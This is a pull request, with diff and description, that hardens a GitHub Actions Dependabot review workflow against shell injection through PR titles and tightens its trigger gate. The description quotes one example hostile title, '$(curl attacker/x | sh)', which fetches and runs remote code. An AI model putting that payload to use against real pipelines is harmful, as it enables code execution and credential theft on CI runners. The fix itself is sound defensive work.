### PR TITLE
ci: fix shell injection in dependabot-review workflow

### DIFF
--- a/.github/workflows/dependabot-review.yml
+++ b/.github/workflows/dependabot-review.yml
@@ -7,7 +7,9 @@ on:
 jobs:
   cursor-agent-review:
     name: Cursor Agent Dependency Review
-    if: startsWith(github.head_ref, 'dependabot/')
+    # Gate on the actor, not the branch name: any fork can name a branch
+    # dependabot/... but only real Dependabot PRs run as dependabot[bot].
+    if: github.actor == 'dependabot[bot]' && startsWith(github.head_ref, 'dependabot/')
     runs-on: ubuntu-latest
     timeout-minutes: 35
     permissions:
@@ -18,10 +20,11 @@ jobs:
         id: launch
         env:
           CURSOR_API_KEY: ${{ secrets.CURSOR_API_KEY }}
+          # Pass PR fields through env, never inline ${{ }} in run: the title is
+          # attacker-controlled and would otherwise be executed as shell.
+          PR_URL: ${{ github.event.pull_request.html_url }}
+          PR_TITLE: ${{ github.event.pull_request.title }}
         run: |
-          PR_URL="${{ github.event.pull_request.html_url }}"
-          PR_TITLE="${{ github.event.pull_request.title }}"
-
           PROMPT=$(cat <<'PROMPT_EOF'
           You are reviewing a Dependabot pull request for the currents-mcp repository.
           This is a TypeScript MCP server located in the `mcp-server/` directory.
@@ -197,13 +200,14 @@ jobs:
         env:
           CURSOR_API_KEY: ${{ secrets.CURSOR_API_KEY }}
           SLACK_WEBHOOK_URL: ${{ secrets.SLACK_WEBHOOK_URL }}
+          # Pass interpolated values through env, never inline ${{ }} in run:
+          # PR_TITLE is attacker-controlled; the rest follow the same rule.
+          AGENT_ID: ${{ steps.launch.outputs.agent_id }}
+          AGENT_URL: ${{ steps.launch.outputs.agent_url }}
+          AGENT_STATUS: ${{ steps.poll.outputs.status }}
+          PR_URL: ${{ github.event.pull_request.html_url }}
+          PR_TITLE: ${{ github.event.pull_request.title }}
         run: |
-          AGENT_ID="${{ steps.launch.outputs.agent_id }}"
-          AGENT_URL="${{ steps.launch.outputs.agent_url }}"
-          AGENT_STATUS="${{ steps.poll.outputs.status }}"
-          PR_URL="${{ github.event.pull_request.html_url }}"
-          PR_TITLE="${{ github.event.pull_request.title }}"
-
           SUMMARY=""
           if [ -n "$AGENT_ID" ] && [ "$AGENT_ID" != "null" ]; then
             SUMMARY=$(curl -s -u "$CURSOR_API_KEY:" \

--- a/.github/workflows/dependabot-review.yml
+++ b/.github/workflows/dependabot-review.yml
@@ -7,9 +7,11 @@ on:
 jobs:
   cursor-agent-review:
     name: Cursor Agent Dependency Review
-    # Gate on the actor, not the branch name: any fork can name a branch
-    # dependabot/... but only real Dependabot PRs run as dependabot[bot].
-    if: github.actor == 'dependabot[bot]' && startsWith(github.head_ref, 'dependabot/')
+    # Gate on the PR author, not the branch name: any fork can name a branch
+    # dependabot/... but only real Dependabot PRs are authored by dependabot[bot].
+    # Use pull_request.user.login rather than github.actor so a maintainer who
+    # reopens or pushes to the PR does not flip the actor and skip the review.
+    if: github.event.pull_request.user.login == 'dependabot[bot]' && startsWith(github.head_ref, 'dependabot/')
     runs-on: ubuntu-latest
     timeout-minutes: 35
     permissions:


### PR DESCRIPTION
# User description
## What changed

`.github/workflows/dependabot-review.yml`:

- Move `github.event.pull_request.title` / `html_url` (and the sibling `steps.*.outputs` values) out of the `run:` scripts and into `env:`, referencing them as `"$PR_TITLE"` / `"$PR_URL"`. No `${{ }}` expression is interpolated into a shell body anymore.
- Change the job gate from `startsWith(github.head_ref, 'dependabot/')` to `github.actor == 'dependabot[bot]' && startsWith(github.head_ref, 'dependabot/')`.

## Why

The PR title was expanded into the script text as `PR_TITLE="${{ github.event.pull_request.title }}"`. A title like `$(curl attacker/x | sh)` or a backtick payload executes as shell on the runner at assignment time. The title is fully attacker-controlled, and the old `if:` gate only checked the branch-name prefix — which any fork can set to `dependabot/anything` — so an untrusted PR reached the sink.

Impact today is limited: the trigger is `pull_request` (not `pull_request_target`), so a fork PR runs with a read-only `GITHUB_TOKEN` and no secrets. But this is exactly the pattern that turns into a credential leak the moment someone switches to `pull_request_target` or adds a secret. Fixing it now removes the sink and restricts the job to genuine Dependabot runs.

## Notes for reviewers

- Verified no `${{ github.event... }}` remains inside any `run:` block; the only interpolations are in `env:` (safe — set as environment variables, not evaluated as shell).
- `github.actor` for real Dependabot PRs is `dependabot[bot]`; a fork PR from a human runs as that user and no longer matches, closing the branch-name bypass.
- Behavior for legitimate Dependabot PRs is unchanged.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---

# Generated description

Below is a concise technical summary of the changes proposed in this PR:
Harden the Dependabot review workflow by passing attacker-controlled PR fields through environment variables instead of interpolating them into shell scripts. Restrict execution to PRs authored by <code>dependabot[bot]</code> while preserving Cursor agent launches and Slack notifications.
<table><tr><th>Topic</th><th>Details</th><tr><td><a href=https://baz.co/changes/currents-dev/currents-mcp/173?tool=ast&topic=Shell+Injection+Fix>Shell Injection Fix</a>
        </td><td>Prevent shell injection by moving PR metadata and step outputs into <code>env:</code> variables consumed safely by the Cursor launch and Slack notification scripts.<details><summary>Modified files (1)</summary><ul><li>.github/workflows/dependabot-review.yml</li></ul></details><details><summary>Latest Contributors(2)</summary><table><tr><th>User</th><th>Commit</th><th>Date</th></tr><tr><td>agoldis@gmail.com</td><td>ci: gate dependabot re...</td><td>August 17, 2026</td></tr>
<tr><td>miguelangarano@gmail.com</td><td>fix: model name</td><td>April 06, 2026</td></tr></table></details></td></tr>
<tr><td><a href=https://baz.co/changes/currents-dev/currents-mcp/173?tool=ast&topic=Dependabot+Gating>Dependabot Gating</a>
        </td><td>Restrict the review job to genuine Dependabot-authored pull requests, preventing fork branches named <code>dependabot/*</code> from bypassing the workflow gate.<details><summary>Modified files (1)</summary><ul><li>.github/workflows/dependabot-review.yml</li></ul></details><details><summary>Latest Contributors(2)</summary><table><tr><th>User</th><th>Commit</th><th>Date</th></tr><tr><td>agoldis@gmail.com</td><td>ci: gate dependabot re...</td><td>August 17, 2026</td></tr>
<tr><td>miguelangarano@gmail.com</td><td>fix: model name</td><td>April 06, 2026</td></tr></table></details></td></tr></table>
<sub><a href="https://baz.co/changes/currents-dev/currents-mcp/173?tool=ast">Review this PR on Baz</a> | <a href="https://baz.co/agents/baz">Customize your next review</a></sub>

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Improved the safety and reliability of automated dependency update reviews.
  * Prevented potentially unsafe pull request content from affecting automated processing.
  * Improved the reliability of review-result notifications.

* **Chores**
  * Tightened workflow conditions so automated reviews run only for eligible dependency update pull requests.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->